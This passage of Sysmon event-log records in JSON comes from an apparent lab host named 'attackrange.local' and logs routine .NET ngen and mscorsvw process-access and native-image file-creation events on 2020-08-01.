C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.715","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-001052340F00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7181,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.762\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010F0370F00}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.762","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010F0370F00}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7182,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.762\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010F0370F00}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.762","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010F0370F00}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7183,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.762\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010F0370F00}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.762","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010F0370F00}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7184,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:46.918\r\nProcessGuid: {A837DB8D-0496-5F25-0000-0010F0370F00}\r\nProcessId: 4624\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1210-0\\PresentationFramework.AeroLite.dll\r\nCreationUtcTime: 2020-08-01 05:58:46.918","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:46.918","ProcessGuid":"{A837DB8D-0496-5F25-0000-0010F0370F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1210-0\\PresentationFramework.AeroLite.dll","CreationUtcTime":"2020-08-01 05:58:46.918","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7185,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.949\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010430B0E00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.949","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010430B0E00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7186,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.949\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010430B0E00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.949","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010430B0E00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7187,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010430B0E00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010430B0E00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7188,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.012\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-00106B400F00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.012","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-00106B400F00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
